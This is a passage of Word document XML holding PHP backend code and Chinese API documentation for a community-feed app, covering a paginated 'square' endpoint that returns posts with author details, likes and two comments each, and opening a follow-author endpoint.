    <w:p w14:paraId="5204C6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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B3B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'in', $followed_circle_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760A3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416B05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41B696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14AC9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(count($articles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90E9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($articles['data'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416086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($article['images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F111C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explode(',', $article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7950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foreach ($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1729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$articles['data'][$key]['image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A2B4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EA29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3CB3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$articles['data'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA5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$articles['data'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F410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$articles['data'][$key]['author_follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EB4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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8EF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$articles['data'][$key]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15664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$articles['data'][$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A94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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7CFF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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FAF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3114DD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_user($article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08942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36E05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$articles['data'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586EF6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$articles['data'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FDE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$articles['data'][$key]['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC192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760F6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88230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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45864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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C66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A25A5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Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215004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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0FC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79513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16C7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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA60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$article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594789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8773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$circle['img'] = $circle['img'] ? _imgUrl() . $circle['img'] : '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008156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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE78E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A631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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26765E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$article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26256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03A43B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4E814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190C0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($follow &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939A5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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DB8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DA7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$articles['data'][$key]['zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6E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$article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F6C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533545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3DAEA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6F422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$articles['data'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58588A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57B65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-&gt;where('uid', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AD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6D0E9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9D0A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$articles['data'][$key]['circle'] = $circle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB57F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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD7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$article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52434C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7AE840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-&gt;limit(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B025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2FD45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(count($pings) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972AE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($pings as $k =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A7E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_user($ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B7E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$pings[$k]['author_username'] = $member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC36A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$pings[$k]['author_img'] = $member['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA4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E5AB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0429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$articles['data'][$key]['pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6F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8953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B4487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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10CD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02B0C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52C7F1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89A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7E7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D2117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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C6B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50C19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2D7BFF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0E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C8BE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4747BD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263CC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CC3B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0A21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1C27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=&gt; $circles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEA5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=&gt; $articles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620A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9028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7285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8A5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/api/circle/square </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区广场（社区动态｜用户动态列表分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808C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用户社区广场（社区动态｜用户动态列表分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382F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530CE2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05770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（已登录用户必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25717C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is_hot        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否为热门：</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否（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCBEB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is_latest     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否为最新：</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否（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631683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type_id       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B49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page          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1C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per_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F2C3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{Json} result            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态｜用户动态列表（分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E8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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF27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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA059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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18929F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data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF65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data.image_urls  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E433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data.zan_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186A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data.cai_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点踩次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C27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data.ping_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186570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data.share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068CE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data.is_top    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否置顶：</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6776F8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data.is_selected </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否加精：</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5A16B8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data.author_username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6F6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data.author_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044937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data.author_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9AD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data.author_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB31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data.zan       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该动态：</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2AF4B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data.follow    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否关注该动态作者：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09EF3D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data.circle       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A16F1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data.circle.title </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D37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data.circle.img   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA808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data.circle.article_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69AC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data.circle.follower_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C9C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data.circle.follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否该动态所属社区：</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6EDC8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data.pings                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态的两条评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE94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data.pings.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19172F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data.pings.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983EB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EA90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square()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF2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2B81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 = input('param.page', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D01B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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594F0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$is_hot = input('param.is_hot', 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE8B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$is_latest = input('param.is_latest', 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95B6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input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138316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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FCA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466B9F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($is_hot != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD74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$is_hot = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA93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$is_latest = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48C2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D16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$query-&gt;whereOr('is_top', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09737E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-&gt;whereOr('is_selected', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED9C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ECB8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($is_latest != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38691C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$is_hot = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33764E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$is_latest = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB84B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25367F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$query-&gt;order('create_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA4C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-&gt;order('update_time', 'desc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240358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5884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($type_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4FB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$is_hot = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0A5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$is_latest = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038CB2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$circles = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC3A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-&gt;field('id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D0C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-&gt;where('type_id', $type_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED24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FAA2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(count($circles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6B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$circle_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6B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($circles as $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A83A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$circle_ids[] = $circle['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833AE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BF3F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$query = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F55D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40217A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'in', $circle_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A66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E757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0870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 = $query-&gt;paginate($per_page, false, ['page' =&gt; $page,])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB5F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61F72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(count($articles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED4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($articles['data'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311F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($article['images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22856D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explode(',', $article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C806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($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD6F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$articles['data'][$key]['image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D53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5C2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837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$articles['data'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD04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$articles['data'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F920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$articles['data'][$key]['author_follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00852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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102BB7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$articles['data'][$key]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7832A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$articles['data'][$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA04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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432BCD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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0269BE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2DB01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_user($article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7C8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265C8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$articles['data'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B4E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$articles['data'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E7B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$articles['data'][$key]['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA69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0DD51F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442974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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057525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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1AD9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3267A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$articles['data'][$key]['author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264910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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0541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0BA7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A883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$circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF0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$article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C1D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1F25F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$circle['img'] = $circle['img'] ? _imgUrl() . $circle['img'] : '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A515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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A7D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6835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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD3A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$article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB192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36400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51BA5E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5C65C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($follow &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E634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$circle['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7EA9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3AAF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$articles['data'][$key]['zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7769E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$article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35079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7F8101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-&gt;where('zan', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333A3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F0824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$articles['data'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A23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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18E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45346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07491A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8DDE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$articles['data'][$key]['circle'] = $circle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EF2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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD4A1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-&gt;where('article_id', $article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CB4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-&gt;order('create_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF2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-&gt;limit(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F68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627E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(count($pings) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CDB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($pings as $k =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4F28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_user($ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4A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$pings[$k]['author_username'] = $member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D9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$pings[$k]['author_img'] = $member['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3D6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69F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9080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$articles['data'][$key]['pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A5B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F75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E14B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json($articles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2616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4A23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4439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/api/circle/follow_author </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注｜取消关注用户社区动态作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414FDE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关注｜取消关注用户社区动态作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018EE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478E48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872C8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26848E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article_id    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
